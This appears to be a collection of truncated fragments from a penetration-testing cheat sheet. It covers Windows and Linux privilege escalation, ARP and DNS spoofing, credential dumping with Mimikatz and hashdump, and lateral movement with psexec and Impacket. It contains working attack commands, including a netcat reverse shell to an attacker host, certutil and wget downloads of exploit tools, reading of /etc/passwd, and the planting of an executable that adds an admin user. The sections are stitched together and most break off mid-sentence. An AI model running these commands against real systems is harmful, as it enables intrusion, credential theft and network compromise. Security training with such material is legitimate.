-
Enumeration in PowerShell
Caution: This command works via RDP in an interactive session, but NOT in a non-privileged bind/winrm shell.
All services:
PS> Get-CimInstance -ClassName win32_service | Select Name,State,PathName
All running services:
PS> Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
…
-
Compile it natively or cross-compile it:
x86_64-w64-mingw32-gcc searchedName.cpp --shared -o searchedName.dll
Restart the service / application somehow and check whether the new user admin2 now exists.
Reflective DLL Injection
See https://github.com/stephenfewer/ReflectiveDLLInjection
-
Binary hijacking
Check if a binary (e.g. from a service) is writable:
PS C:\Users\dave> icacls "C:\xampp\apache\bin\httpd.exe"
C:\xampp\apache\bin\httpd.exe BUILTIN\Administrators:(F)
                              NT AUTHORITY\SYSTEM:(F)
                              BUILTIN\Users:(F)
                              NT AUTHORITY\Authenticated Users:(RX)
Legend:
If yes, replace it with a more useful executable, like this one. Compile this for the correct target architecture and replace the original file.
x86_64-w64-mingw32-gcc adduser.c -o adduser.exe
Check this with one command:
-
An Ettercap successor, written in Go.
Basic commands:
Passive ARP probing:
net.recon on
net.recon off
Active probing:
net.probe on
net.probe off
Sniffing:
set net.sniff.output /tmp/sniff.pcap // optional
net.sniff on
net.sniff off
Spoofing:
set arp.spoof.targets $target1, $target2, $target3
arp.spoof on
arp.spoof off
DNS Spoofing:
set dns.spoof.domains target.domain // the domain which should be resolved as…
set…
-
Various
Show who else is logged in.
qwinsta
Open the Event Viewer and search in the logs. Have fun!
Network enumeration
Show the network configuration. Are there multiple interfaces?
ipconfig /all
Routing information
route print
Show current network connections. After running this command, CHECK all ports against the ones found previously!
netstat -ano
Check the ARP cache…
-
Prepare your own system:
cd p151.general.1
./scripts/update_privesc_scripts.sh
cd scripts/privesc/linux
python -m SimpleHTTPServer 80
Prepare the target:
cd /dev/shm
wget http://$attackerip/_ex.tar
tar xf _ex.tar
script
Now, execute it:
LinPeas: ./linpeas.sh
LinEnum: ./LinEnum.sh
linux-smart-enumeration: ./lse.sh -l1
linux-exploit-suggester-2: ./linux-exploit-suggester-2.pl
sudo-killer: ./SUDO_KILLERv2.0.5.sh
linuxprivchecker: ./linuxprivchecker.py
Finally: Copy the typescript file (written by script) to the PentestManager!
-
Additional ideas
Environment exploitation
Interpolation exploitation
Prerequisites:
Then, create a file in the directory whose name looks like a parameter of the program. The program will interpret the filenames as arguments.
Example: Assume there is a call like this in a script:
tar czf /tmp/backup.tar.gz *
The script is in /home/peter and because we are this…
-
If your console is narrow, widen it at the beginning:
stty rows 50 cols 200
Consider directly spawning another reverse shell:
nc -e /bin/sh $attackerip 4444 &
Basic enumeration about the host
id
groups
cat /etc/passwd
cat /etc/group
cat /etc/hosts
cat /etc/fstab
uname -a // Check for kernel exploits // ALSO search for kernel exploits with the OS name! // If this…
-
Execution
If you cannot execute an exe file, try these options:
Windows firewall / netsh
Check firewall state
netsh advfirewall show currentprofile
netsh advfirewall show state
If the firewall is active, list the configuration:
netsh advfirewall show config
Example of how to add exceptions to the firewall via the command line as an administrator:
C:\Windows\temp> netsh advfirewall firewall…
-
Prepare your own system:
cd p151.general.1/scripts/privesc/windows
python -m SimpleHTTPServer 80
Prepare the target:
set NTPSRV=$ownIp
mkdir C:\Windows\System32\spool\drivers\color\wsc
cd C:\Windows\System32\spool\drivers\color\wsc
Download most scripts at once (>30 MB!):
certutil.exe -urlcache -split -f "http://$NTPSRV/7za.exe"
certutil.exe -urlcache -split -f "http://$NTPSRV/_ex.zip"
7za.exe x _ex.zip
WinPeas (Github)
winPEAS.bat
winPEASx86.exe
winPEASx64.exe
Powerless (Github)
certutil.exe -urlcache -split -f "http://$NTPSRV/Powerless.bat"
Powerless.bat
Windows Exploit Suggester NG (Github)…
-
This site contains links to tools / techniques which can run in the background during an engagement. Linux Windows
-
With username/password
With psexec (Prerequisites: the ADMIN$ share is available, and the user is part of the local administrator group on the target)
With psexec via Metasploit
use exploit/windows/smb/psexec
With atexec (Impacket)
atexec.py dom/user:pass@$target cmd.exe
With wmiexec
wmiexec.py domain.local/$target:$password@$ip
With Smbmap
smbmap -u ariley -p 'pass' -d WORKGROUP -x 'whoami' -H $target
With Wmic (To run a…
-
Automates Windows enumeration. Github page
Usage
Seatbelt.exe -group=all
Run Seatbelt.exe without arguments to see the possible parameters.
Example
Seatbelt.exe OSInfo Processes
Remote
From another Windows system, Seatbelt can connect to a victim and perform commands there.
Seatbelt.exe LogonSessions -computername=$victim -username=bob -password=bobber
Command aggregation
There are already some groups defined which perform multiple tests at once.
Seatbelt.exe -group=system [-computername=...]
Seatbelt.exe…
-
For reverse engineering
Device name: Content
/proc/$pid/maps: Shows the memory mapping of a process. Includes all used libraries.
/proc/self/loginuid: Own UID.
Read processes
If you can read /proc via an LFI:
#!/bin/bash
# Output directory for the fetched cmdline files (must exist before curl writes into it)
mkdir -p /tmp/proc
for i in {1..1024}
do
  echo $i
  curl http://10.10.11.154/index.php\?page=/proc/$i/cmdline --output /tmp/proc/$i
done
Then, look in the /tmp/proc directory for files > 0 bytes.
Read environment of…
-
Try these resources if you can access files but cannot list them.
http://pwnwiki.io/#!presence/windows/blind.md
Cheat sheet 1
List
In Apache, and probably in more systems, you can “travel over” non-existing files because the path is shortened before the existence of a file is checked. Example: /test/test.txt/../../index.html will return the root’s index.html in Apache even if the test directory and…
-
Windows creates and stores credentials in memory in the Local Security Authority Subsystem Service (LSASS). On the filesystem, the SAM database stores the hashes.
Use Mimikatz
Usage
Enable debug mode. This uses the SeDebugPrivilege so that we are able to communicate with other processes.
privilege::debug
Try to elevate privileges to obtain SYSTEM user privileges:…
-
Without shell access
With shell access
Choose one method to enumerate.
1. User and group enumeration with net (!)
See what roles/privileges THIS USER has, also locally. Maybe he/she already has administrative privileges.
whoami /all
List (and store!) the users of the domain
net user /domain
List (and store!) information like full names, group memberships, etc.…
-
Collection of privesc scripts. To start, upload PowerView.ps1 and:
powershell -exec bypass
PS> Import-Module .\PowerView.ps1
See the github site for all commands.
General enumeration
powershell -exec bypass
PS> . .\PowerUp.ps1
PS> Invoke-AllChecks
Or:
powershell.exe -c "Import-Module .\PowerUp.ps1; Invoke-AllChecks"
About users
Enumerates all users.
Get-NetUser
Enumerates all users which do not require Kerberos preauth.
Get-NetUser -PreauthNotRequired
Returns…
-
Mainly post exploitation for AD environments. (Download — also included in Kali sources)
Quick usage for privilege escalation
General usage
Metasploit syntax / PSE syntax
Note: After usemodule, don’t forget to go “back” and to “interact” with the agent to see job results!
Commands with an asterisk require a high-integrity Empire Agent. To upgrade one…
-
See the Impacket site for a short description of all tools.
Tip: On Kali, use the command impacket-*
Enumeration without authentication
Determine the system architecture
getArch.py -target $target
Returns the listening RPC interface IDs.
ifmap.py $target 135
rpcdump.py $target
Enumeration with partial authentication
Scenario: You have credentials for one AD user. Then, try to get all users for…
-
Windows clients use SAM files. A Windows DC uses ntds.dit to store all hashes of the domain.
SAM
C:\windows\repair\sam
C:\windows\System32\config\SAM
C:\windows\System32\config\RegBack\SAM
Alternatives in meterpreter:
run post/windows/gather/hashdump
run post/windows/gather/smart_hashdump
run hashdump
hashdump (load the module first: use priv)
creds_all
If hashdump doesn’t work:
Notes
Format
Username : UID : LM hash : NTLM hash : : :
For hashcat,…
-
1. Manual enumeration
id
pwd
uname -a // are there kernel exploits?
cat /etc/hosts
cat /etc/passwd
ls -lah /etc/passwd
cat /etc/group
cat /etc/fstab
cat /etc/crontab
df
cd /home && ls ... // or execute ls -lahR /home/
cd /root && ls ...
netstat -antup
ps aux
sudo -l
su // if passwords are already known…
-
Enumeration
Show currently logged-in users
finger @ip
User enumeration
for username in $(cat cirt-default-usernames.txt); do finger $username@10.10.10.76 >> /tmp/finger; done
Enumeration with Metasploit:
msf5 > use auxiliary/scanner/finger/finger_users
msf5 auxiliary(scanner/finger/finger_users) > set rhosts 10.10.10.76
rhosts => 10.10.10.76
msf5 auxiliary(scanner/finger/finger_users) > run
Exploits
On very old systems, according to https://insecure.org/sploits_all.html, it was possible to execute commands, e.g. with finger "|/bin/id@host'
-
Use bof1_web.py or bof1_socket.py to start. Use bof1_socket_10.py to determine the position of the EIP. Use bof2_socket_20.py with the found EIP offset to verify that the EIP was overwritten with B’s. Use bof3_socket_10.py with the found EIP and find all bad chars. Find a JMP address with Mona. Create the payload, add it, and profit.
0. Confirm vulnerability
Download…
-
Name confusion
Serve a file:
echo -e "HTTP/1.1 200 OK\nContent-Length: 5\n\nHallo" | nc -l localhost 8000
Request a file over SSL:
echo -e "GET / HTTP/1.1\nHost: localhost\n\n" | ncat -C --ssl localhost 443
Return the output of a program:
ncat -l localhost 3000 --exec /bin/date
Transfer a file directly (unencrypted!):
1. Receiver:
user@host02:~$ ncat -l > aha
or
nc -nlvp 4444…
-
https://github.com/diego-treitos/linux-smart-enumeration
This script shows relevant information about the security of the local Linux system.
Quick install
Details from the manual
It has 3 levels of verbosity so you can control how much information you see. At the default level you should see the highly important security flaws in the system. Level 1 (./lse.sh -l1)…
-
Like OSXcollector, but for Windows. Collects information on a host for later analysis. https://www.fireeye.com/services/freeware/redline.html
-
osxcollector http://yelp.github.io/osxcollector/ Stand-alone Python script. Execute it on the Mac which should be analysed. It creates an archive with “everything” interesting, which the victim can hand over to an expert. See Redline for Windows.